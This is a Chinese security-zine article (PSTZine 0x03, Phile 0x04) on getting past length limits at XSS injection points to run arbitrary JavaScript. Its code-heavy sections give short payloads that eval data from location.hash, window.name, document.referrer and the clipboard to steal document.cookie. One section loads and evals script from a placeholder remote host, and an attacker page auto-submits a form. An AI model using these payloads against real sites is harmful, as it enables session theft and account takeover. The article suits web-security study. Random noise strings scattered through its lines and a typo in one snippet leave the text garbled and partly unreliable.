[PSTZine 0x03][0x04][突破XSS字符数量限制执行任意JS代码]

admin

                           ==Ph4nt0m Security Team==
5 ?1 C9 f9 A/ C1 A: y; @; S
                       Issue 0x03, Phile #0x04 of 0x07
, z  S- t' A" E4 p1 B. V
5 E' }  c+ c5 B
|=---------------------------------------------------------------------------=|
|=-------------------=[ 突破XSS字符数量限制执行任意JS代码 ]=-----------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=------------------------=[      By luoluo     ]=---------------------------=|
|=----------------------=[   <luoluo#ph4nt0m.org>  ]=------------------------=|
2 r- h; h5 S8 P4 K$ O7 B5 R|=----------------------=[    <luoluo#80sec.com>   ]=------------------------=|
3 z' Q) a2 j6 G5 a8 V. }& @|=---------------------------------------------------------------------------=|


[目录]
2 T  C+ K; q: k
1. 综述
6 t; H1 j: j" j/ ?& C  I2. 突破方法
  2.1 利用HTML上下文中其他可以控制的数据
9 g+ ?1 O6 T; _! R  2.2 利用URL中的数据
  2.3 JS上下文的利用
  2.4 利用浏览器特性在跨域的页面之间传递数据
# J- i* X# N1 @8 j    2.4.1 document.referrer
    2.4.2 剪切板clipboardData
) }' t+ N4 Z" N" X( h% w+ e& k    2.4.3 窗口名window.name
% X. k! P% `# z6 n+ H$ @8 W. [  2.5 以上的方式结合使用
2 x- Z; A: E2 \' d5 X% V$ O  {' O3. 后记
  z1 w% L, O$ V8 ?* ]4. 参考
' n- n; \8 G6 P  _
% i! }4 V, }* m8 t
一、综述

! z$ k) R, H4 I( r4 D$ k$ G    有些XSS漏洞由于字符数量有限制而没法有效的利用，只能弹出一个对话框来YY，本文主
% B4 \1 t# x8 D+ r, `# g要讨论如何突破字符数量的限制进行有效的利用，这里对有效利用的定义是可以不受限制执
行任意JS。对于跨站师们来说，研究极端情况下XSS利用的可能性是一种乐趣；对于产品安全
7 T8 K8 k) Z* q2 V# N人员来说，不受限制的利用的可能是提供给开发人员最有力的证据，要求他们重视并修补这些
极端情况下的XSS漏洞。
5 ^: a8 A  x. x7 {( g/ @# s' m  m! M) ~
# z; w; \* |6 o# j    突破的方法有很多种，但是突破的思想基本都一样，那就是执行可以控制的不受限制的数
" V# J" X9 X% `8 q3 R! h据。
6 }; r+ X. c+ g, h# K% N- E6 t$ A7 z

1 M; N) h- G2 N1 o# @5 J二、突破方法

2.1 利用HTML上下文中其他可以控制的数据
' z, ~! C/ k; M2 B
1 X4 o9 K% b% b) D    如果存在XSS漏洞的页面HTML上下文还有其他可以控制的数据，那么可以通过JS获得该数
- _$ b, {6 G0 c$ w) I据通过eval或者document.write/innerHTML等方式执行该数据，从而达到突破XSS字符数量限
制的目的，下面例子假设div元素的内部数据可以控制，但是该数据已经被HTML编码过：
0 d" u" `  x+ ^; W
--code-------------------------------------------------------------------------
  v1 T( F/ E: u9 E9 O* v<div id="x">可控的安全的数据</div>
, b+ A: l1 B+ A<limited_xss_point>alert(/xss/);</limited_xss_point>
-------------------------------------------------------------------------------

    由于XSS点有字符数量限制，所以这里只能弹框，那么我们可以把XSS的Payload通过escape
编码后作为安全的数据，输出到可控的安全数据位置，然后在XSS点执行可控的安全数据：

--code-------------------------------------------------------------------------
, b3 ^7 j3 [! {" ]0 k0 G<div id="x">alert%28document.cookie%29%3B</div>
<limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>
4 W) h7 U9 C4 h4 Y! Z' X-------------------------------------------------------------------------------

+ c0 p8 ], Y7 V$ s3 a. R1 t长度：28 + len(id)

: z( B$ I9 v6 u  ]5 f" G0 e; z    由于x内部的数据没有字符数量的限制，那么从而可以达到执行任意JS的目的。


; l0 A$ \& Y9 ~: l  y2.2 利用URL中的数据

# d3 b0 U2 @( G% z& z" Z/ e    如果页面里不存在上一节所说的可控HTML上下文数据怎么办？有些数据是我们无条件可
控的，第一个想到的就是URL，通过在URL的尾部参数构造要执行的代码，然后在XSS点通过
% d3 l+ V- {6 mdocument.URL/location.href等方式获得代码数据执行，这里假设代码从第80个字符开始到
最后：
, `& M2 j$ p: |- _' s7 p
--code-------------------------------------------------------------------------
8 {7 _' W, a4 s7 \http://www.xssedsite.com/xssed.php?x=1....&alert(document.cookie)
* t4 x: R( v6 n8 h: w
<limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
; d8 Q6 T3 O6 \# d  d4 i0 Z-------------------------------------------------------------------------------
5 ]* \$ h0 c% Y
0 K8 b/ n9 O0 }长度：30

--code-------------------------------------------------------------------------
6 B& f# I1 g. s' V1 [0 K<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
-------------------------------------------------------------------------------
9 v2 R9 H, v! @8 r5 \3 m* c
$ q/ y2 d4 Z! ~* r0 n- a3 w长度：31
6 x; W% o- \& D3 K# l# R
    上面两个例子对比，前一个例子更短，那么有没有办法更短呢？通过查阅JavaScript手册
的String的方法可以发现，切割字符串有一个更短的函数slice，5个字符比substr还要短一个
字符：
$ ], f! B! {+ x  U1 m2 V( u5 u
5 c" W+ B: J4 ~( @+ s--code-------------------------------------------------------------------------
6 @( m$ U# P; I  f" C8 O7 n<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
-------------------------------------------------------------------------------

0 y9 g3 `" [; Z/ z长度：29
: M4 z+ [) o! {9 `
--code-------------------------------------------------------------------------
<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
7 W9 O2 p1 D9 j4 C2 W-------------------------------------------------------------------------------
& @! L2 w/ E0 t% W+ U  y
长度：30

    那么还有没有办法更短呢？答案是YES，查阅一下MSND里的location对象的参考你会发现
有个hash成员，获取#之后的数据，那么我们可以把要执行的代码放在#后面，然后通过hash获
得代码执行，由于获得的数据是#开头的，所以只需要slice一个字符就可以拿到代码：

/ N% f/ b; k' l8 ~3 c--code-------------------------------------------------------------------------
, `" v/ l+ e- \7 `6 xhttp://www.xssedsite.com/xssed.php?x=1....#alert(document.cookie)
0 O) W) {  }* w7 B% E
3 r: D! T$ z! m5 ^+ x<limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
-------------------------------------------------------------------------------
$ o# I6 \7 X$ i2 e
长度：29

    这样比上面的例子又少了一个字符。那么还可以更短么？

8 n9 S2 Z9 i0 n5 D) _
, H- H2 H+ B+ `9 E2.3 JS上下文的利用
% W) M. x" U0 O: v* Q) a4 j
0 t3 h* r! b6 h/ X$ i    为什么我如此痛苦？那是因为JS和DHTML的方法名和属性名太长！瞧瞧这些“糟糕”的名字：
+ A! `6 J; F2 W8 F7 _& e8 I* h5 K
# G3 t5 P: ^" n; M" {( |6 YString.fromCharCode
getElementById
getElementsByTagName
& C: \) w( {9 e8 Idocument.write
* ^0 @5 W2 c7 k) ~XMLHTTPRequest
! m$ A5 A# a% u: y4 h/ p: O...
: u1 L, q6 E* d/ v, m
1 }% q9 g7 [+ t, [8 U    就连开发人员也不愿意多写一次，于是很多站点的前端开发工程师们封装了各式各样的
7 E& |3 f$ ]  H; y简化函数，最经典的例子就是：
7 c. ?% j. W1 ~: Y3 c
--code-------------------------------------------------------------------------
, g5 v+ ?' l" ^/ H' qfunction $(id) {
        return document.getElementById(id);
; O1 q  ~% J/ Z, V8 x$ H}
$ D) i4 L: J$ W# N) _4 a* R; Z4 w-------------------------------------------------------------------------------

5 E' }! y; o) H7 o  c    这些函数同样可以为我们所用，用来缩短我们的Payload的长度。不过上面这个例子不是
最短的，IE和FF都支持直接通过ID来引用一个元素。有些函数可以直接用来加载我们的代码：
- C/ e8 K1 U0 |8 n: k; j. f: N& `5 R
4 i& [" r5 S$ r5 p' E5 `# B! C--code-------------------------------------------------------------------------
9 i/ |7 W+ g6 B5 g$ ~7 jfunction loads(url) {
- F, S- Z3 [4 |+ ]/ H  \8 L        ...
( m% O) P  S! _! L9 F( o        document.body.appendChild(script);
! ~' q+ R" Y6 W! `% x}
& _8 {& Y( l$ y& R% J
* ^' \  o, h2 J, W2 ~' y<limited_xss_point>loads('http://xxx.com/x');</limited_xss_point>
' n" A1 j( G1 t2 m$ ], s) t-------------------------------------------------------------------------------

: S' Y3 b. p& S) I. |长度：len(函数名) + len(url) + 5
; E' u' ]( _( r6 z% {' y! I
) L" f* i1 P/ N0 P/ |. H    当然你的url则是越短越好哦！有些函数则会帮我们去作HTTP请求：
# Y! E/ O% P* Y& t: T1 s4 E
--code-------------------------------------------------------------------------
8 }0 p3 b; F. j. Zfunction get(url) {
        ...
- |* m6 t7 w" {' v% ~3 _        return x.responseText;
0 B) {4 }. \) A7 u}
% J2 h& A, Y- q/ C, h$ {
<limited_xss_point>eval(get('http://xxx.com/x'));</limited_xss_point>
-------------------------------------------------------------------------------

长度：len(函数名) + len(url) + 11

    道哥则提出有些流行的JS的开发框架也封装了大量功能强劲的库可供调用，比如：
% A( S! O/ `3 n& }6 m1 g* u
; V$ H* @! V$ IJQuery
YUI
$ W' J7 j  h& f( G+ F2 I...

    综上所述，我们可以通过分析JS上下文现有的框架、对象、类、函数来尽可能的缩短我
们的代码，进而突破长度限制执行任意代码。
6 V0 V& j6 L' d. e- F

2.4 利用浏览器特性在跨域的页面之间传递数据
. K- {. b* A! u8 l/ r
7 `2 z2 o1 Z: F& ^6 g6 I    虽然有同源策略的限制，浏览器的功能设计上仍然保留了极少数的可以跨域传递数据的
方法，我们可以利用这些方法来跨页面传递数据到被XSS的域的页面去执行。

2.4.1 document.referrer

    攻击者可以在自己的域上构造页面跳转到被XSS页面，在自己域上的页面的url里带了
Payload，被XSS的页面通过referrer获取相关代码执行。

攻击者构造的的页面：

--code-------------------------------------------------------------------------
http://www.a.com/attack.html?...&alert(document.cookie)
5 I, e7 o0 _$ _  p* O6 ^6 b+ r- h4 g
<a href="http://www.xssedsite.com/xssed.php">go</a>
& u: R/ A" }  t, `-------------------------------------------------------------------------------

! w: y1 u7 ]) h& V7 |0 Q* f4 c被XSS的页面：
% A, t" v2 C+ @$ {- y2 s% [
--code-------------------------------------------------------------------------
<limited_xss_point>eval(document.referrer.slice(80));</limited_xss_point>
-------------------------------------------------------------------------------

长度：34
* |. v8 E8 q4 g( k% p; P: a! O
    这种方式利用上还有一些问题，如果使用location.href或者<meta http-equiv=refresh>
实现的自动跳转，在IE里被攻击页面拿不到referrer，而FF则可以。QZ建议用表单提交的方式
1 h7 _+ [4 T4 W5 E' J: i比较好，我测试了下，果然通用，FF/IE都可以成功获取referrer：

--code-------------------------------------------------------------------------
" Z5 o* I% R9 o0 N1 M: X* g8 d' x<script type="text/javascript">
<!--
7 l& A; T& \7 dwindow.onload = function(){
        var f = document.createElement("form");
  F9 ^$ L8 Z0 z* J  N  u9 i        f.setAttribute("method", "get");
        f.setAttribute("action", "http://www.xssedsite.com/xssed.php");
  F* D2 B; Z% }; w% ]% [        document.body.appendChild(f);
        f.submit();
1 g2 f6 @: u$ {, o2 s1 _( t};
& N% b* j  ~' W//-->
2 i  C* j# {; }</script>
-------------------------------------------------------------------------------

& H' d4 b1 D/ O0 @
' o/ K3 }% B9 o$ w4 ]$ |% x2.4.2 剪切板clipboardData
/ Y) s" s- A/ [/ C
    攻击者在自己域的页面上通过clipboardData把Payload写入剪切板，然后在被XSS页面获
取并执行该数据。
5 A: n! Z8 a3 t5 D7 p. h) m
攻击者构造的页面：

# y) ?, J" J0 |% U6 J4 M8 \--code-------------------------------------------------------------------------
<script>
; p. C# \( a5 O7 p" r+ P3 \clipboardData.setData("text", "alert(document.cookie)");
0 M1 B( U, D$ t2 K. C+ `</script>
8 Q6 ~: h" C. {5 }' z-------------------------------------------------------------------------------
7 F( W0 s" @2 H9 Y2 M! \
被XSS的页面：

--code-------------------------------------------------------------------------
<limited_xss_point>eval(clipboardData.getData("text"));</limited_xss_point>
-------------------------------------------------------------------------------

长度：36

3 T/ |! W6 W  [, t; [4 m    这种方式只适用于IE系列，并且在IE 7及以上版本的浏览器会有安全提示。
+ i+ v/ @( G3 l4 Y
+ l7 Q) ?$ G2 L# j+ ~8 u0 J
2.4.3 窗口名window.name
3 l6 V) S( `: E* F2 j+ z3 J
3 ]8 J  y  k' Q- N) e* O* @    这是一个很少被用到的特性，在研究同源策略时就注意过这个属性，它是可以跨域传递数
据的，但是这个特性本身并不是漏洞。
8 b* h  a6 X4 |% C5 a9 z
    如果仔细研究过window.open这个方法，会发现一个不常用的第二个参数，这个则是设置
窗口名，用于指定target窗口，如果不存在的话则创建新的子窗口，并设置子窗口的name。当
7 M7 Q- A0 C! H. |1 k* L. U我想打搜window.open时一阵狂喜，喜的是window.name这个属性是window对象的成员，那么只
需要name就可以引用该属性，但是测试时却发现window.open方法对于第二个参数进行了严格
4 `! u, O/ w" A6 I4 U的检查，只允许数字字母以及下划线的组合，禁止特殊字符进入，那么这种方式就没法写入JS
8 f4 [" U7 n- H# f  o2 G或者VBS。

    但是经过测试发现我们可以通过window.name直接设置当前窗口的name则没有特殊字符
+ j* T4 \7 M- a3 G" z限制，然后直接跳转到被XSS的页面，通过name属性传递Payload过去执行：

; g2 s8 V0 x5 }4 ~: M0 d( `5 s( U攻击者构造的页面：
4 y4 X! V. L' a
* X: @" V7 B2 y2 i5 _  i--code-------------------------------------------------------------------------
<script>
# x5 X- T* l& s! Q0 ~: \window.name = "alert(document.cookie)";
% s, \. i5 @, u( n# z) a. B! e3 tlocaton.href = "http://www.xssedsite.com/xssed.php";
( q  \# b0 i3 E0 E2 b% G% s8 `</script>
-------------------------------------------------------------------------------
" H$ p- a" ?% Y+ K6 e% N5 u5 a
被XSS的页面：
3 k. u$ S0 T) H# E
1 b$ a" K2 c9 |' L0 X--code-------------------------------------------------------------------------
0 }) u5 z4 h  R<limited_xss_point>eval(name);</limited_xss_point>
-------------------------------------------------------------------------------
8 v. A; m* _' }! |; B+ I
6 o7 Z6 w* \. Y9 O长度：11
8 y1 M7 L, u$ ^
    这个长度可以说是短到极致了，并且这个方法IE/FF都可以很好的支持，是个非常有意思
的技巧，这个技巧的发现也是促成本文的直接原因。

    window.name的特性还有其他一些有趣的应用方式，这个方面的话题以后可以专门写篇文
7 ~1 T. w$ L4 r8 u# `2 v章来探讨。
: N/ o# p# S& J) a; g5 p

' r9 ~, T8 _9 p& `" Z: a6 D2.5 以上的方式结合使用
5 w2 ^7 o# R1 ^
/ ?) a0 e5 F% l: f$ }! h$ g, I" ~: n9 \  J    以上的方式结合使用，一般情况下会使得长度更长，但是也不排除在某些变态的过滤情况
% l( F  A$ _$ A4 b6 v" j! p2 C, b中，灵活的组合上面的方法可能会起到奇效。


三、后记

    JS非常灵活，所以方法肯定不限于这些，在具体的问题的分析和研究中，可以获得很多的
乐趣，并且对JS以及浏览器本身有了更深的认识，如果您有巧妙的技巧或者新奇的构思，欢迎
和我交流！

6 P- `0 r" w6 v' M3 F6 j    感谢axis*刺*大风*道哥、rayh4c*QZ*茄子为本文提出的宝贵意见！

! }2 t" h3 a! h2 M8 ^    本文是纯粹的技术探讨，请勿用于非法用途！
# v9 s5 q1 F" v) l4 n% e; P

四、参考
! Q9 d- i6 u  T6 ], u  ~2 ~
6 J5 `/ H4 N/ x% \% ehttp://msdn.microsoft.com/en-us/library/aa155073.aspx

8 N  X8 K' k' _-EOF-